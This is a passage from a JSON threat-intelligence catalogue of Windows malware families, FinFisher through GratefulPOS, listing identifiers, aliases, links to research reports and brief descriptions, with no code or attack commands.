"https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", - 
"https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", - "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", - "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", - "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", - "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" - ] - }, - "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", - "value": "FinFisher RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball", - "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" - ] - }, - "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", - "value": "Fireball", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt", - "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" - ] - }, - "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", - "value": "FireCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] - }, - "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c", - "value": "FireMalv", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom", - "https://twitter.com/JaromirHorejsi/status/815949909648150528" - ] - }, - "uuid": 
"1ab17959-6254-49af-af26-d34e87073e49", - "value": "FirstRansom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", - "https://github.com/Coldzer0/Ammyy-v3", - "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" - ] - }, - "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", - "value": "FlawedAmmyy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy", - "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] - }, - "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", - "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", - "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", - "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", - "http://adelmas.com/blog/flokibot.php", - "https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/", - "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", - "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", - "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/" - ] - }, - "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", - "value": "FlokiBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", - 
"https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" - ] - }, - "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", - "value": "Floxif", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc", - "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" - ] - }, - "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03", - "value": "Flusihoc", - "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", - "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", - "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", - "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", - "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", - "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" - ] - }, - "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", - "value": "Fobber", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", - "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", - "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", - "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", - "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", - "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", - 
"http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", - "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" - ] - }, - "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", - "value": "Formbook", - "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware." - }, - { - "meta": { - "synonyms": [ - "ffrat" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", - "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" - ] - }, - "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", - "value": "FormerFirstRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", - "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" - ] - }, - "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", - "value": "Freenki Loader", - "description": "" - }, - { - "meta": { - "synonyms": [ - "BitPaymer" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - ] - }, - "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", - "value": "FriedEx", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f", - "https://sentinelone.com/blogs/sfg-furtims-parent/" - ] - }, - "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", - "value": "Furtim", - "description": "" - }, - { - "meta": { - "synonyms": [], - 
"type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader" - ] - }, - "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", - "value": "GalaxyLoader", - "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n" - }, - { - "meta": { - "synonyms": [ - "pios" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos", - "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" - ] - }, - "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", - "value": "gamapos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" - ] - }, - "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", - "value": "Gameover DGA", - "description": "" - }, - { - "meta": { - "synonyms": [ - "ZeuS P2P", - "GOZ" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", - "https://www.wired.com/?p=2171700", - "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf", - "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", - "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", - "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf" - ] - }, - "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", - "value": "Gameover P2P", - "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. 
According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" - ] - }, - "uuid": "9664712b-81f1-4c52-ad4d-a657a120fded", - "value": "Gamotrol", - "description": "" - }, - { - "meta": { - "synonyms": [ - "GrandCrab" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", - "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", - "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", - "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", - "http://asec.ahnlab.com/1145", - "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", - "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", - "https://isc.sans.edu/diary/23417", - "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", - "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", - "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/" - ] - }, - "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", - "value": "win.gandcrab", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox", - "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" - ] - }, - "uuid": 
"591b2882-65ba-4629-9008-51ed3467510a", - "value": "Gaudox", - "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only)." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss", - "http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html" - ] - }, - "uuid": "5f8be453-8f73-47a2-9c9f-e8b9b02f5691", - "value": "Gauss", - "description": "" - }, - { - "meta": { - "synonyms": [ - "WhiteBear" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", - "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", - "https://securelist.com/introducing-whitebear/81638/", - "https://www.youtube.com/watch?v=Pvzhtjl86wc", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", - "https://github.com/eset/malware-ioc/tree/master/turla" - ] - }, - "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", - "value": "Gazer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman", - "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" - ] - }, - "uuid": "ed0586d1-4ff0-4d39-87c7-1414f600d16e", - "value": "gcman", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer", - "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html", - "https://www.rekings.com/ispy-customers/" - ] - }, - "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", - "value": "GearInformer", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Emotet", - "Heodo" - ], - "type": [], - 
"refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo", - "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", - "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", - "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", - "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", - "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", - "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", - "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", - "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", - "https://www.us-cert.gov/ncas/alerts/TA18-201A", - "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", - "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", - "https://feodotracker.abuse.ch/?filter=version_e", - "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", - "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" - ] - }, - "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", - "value": "Geodo", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", - "value": "GetMail", - "description": "" - }, - { - "meta": { - "synonyms": [ - "getmypos" - ], - "type": [], - 
"refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass", - "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", - "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html" - ] - }, - "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", - "value": "GetMyPass", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CoreImpact (Modified)" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", - "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", - "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", - "https://www.coresecurity.com/core-impact" - ] - }, - "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", - "value": "Ghole", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Remosh" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", - "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", - "https://en.wikipedia.org/wiki/GhostNet" - ] - }, - "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", - "value": "Gh0stnet", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Ghost iBot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin", - "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", - "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" - ] - }, - "uuid": "6201c337-1599-4ced-be9e-651a624c20be", - "value": "GhostAdmin", - "description": "" - }, - { - "meta": { - "synonyms": [ - "PCRat", - "Gh0st RAT" - ], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", - "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", - "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", - "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "http://www.malware-traffic-analysis.net/2018/01/04/index.html", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", - "http://www.hexblog.com/?p=1248", - "https://blog.cylance.com/the-ghost-dragon" - ] - }, - "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", - "value": "Ghost RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Wordpress Bruteforcer" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses", - "https://forum.exploit.in/pda/index.php/t102378.html" - ] - }, - "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", - "value": "Glasses", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat", - "https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" - ] - }, - "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", - "value": "GlassRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", - "https://blog.ensilo.com/globeimposter-ransomware-technical", - "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet", - "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", - 
"https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", - "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", - "https://isc.sans.edu/diary/23417" - ] - }, - "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", - "value": "GlobeImposter", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom" - ] - }, - "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", - "value": "Globe", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", - "value": "GlooxMail", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", - "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", - "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", - "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/", - "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", - "http://resources.infosecinstitute.com/tdss4-part-1/" - ] - }, - "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", - "value": "win.glupteba", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" - ] - }, - "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", - "value": "Godzilla Loader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", - "value": "Goggles", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Petya/Mischa" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", - "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html", - "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" - ] - }, - "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", - "value": "GoldenEye", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", - "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" - ] - }, - "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", - "value": "GoldDragon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", - "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" - ] - }, - "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", - "value": "Golroted", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Fuerboos" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", - "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" - ] - }, - "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", - "value": "Goodor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat", - "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" - ] - }, - "uuid": "d1298818-6425-49be-9764-9f119d964efd", - "value": "GoogleDrive RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic", - "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" - ] - }, - "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", - "value": "GooPic Drooper", - "description": "" - }, - { - "meta": { - "synonyms": [ - "talalpek", - "Xswkit" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", - "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669", - "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", - "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", - "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", - "https://www.us-cert.gov/ncas/alerts/TA16-336A", - "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", - "https://www.youtube.com/watch?v=242Tn0IL2jE", - "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", - "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", - "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", - "https://news.drweb.com/show/?i=4338&lng=en", - "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/", - "https://www.youtube.com/watch?v=QgUlPvEE4aw", - 
"https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055" - ] - }, - "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", - "value": "GootKit", - "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat", - "https://www.yumpu.com/en/document/view/55930175/govrat-v20" - ] - }, - "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", - "value": "GovRAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CRM", - "Gozi CRM", - "Papras", - "Snifula", - "Ursnif" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", - "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/", - "https://www.secureworks.com/research/gozi", - "https://lokalhost.pl/gozi_tree.txt", - "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html" - ] - }, - "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", - "value": "Gozi", - "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. 
Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", - "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2", - "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", - "https://de.securelist.com/analysis/59479/erpresser/", - "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", - "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/" - ] - }, - "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", - "value": "GPCode", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot", - "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" - ] - }, - "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", - "value": "GrabBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", - "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" - ] - }, - "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", - "value": "Graftor", - "description": "" - }, - { - "meta": { - "synonyms": [ - "FrameworkPOS", - "trinity" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", - "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", - 
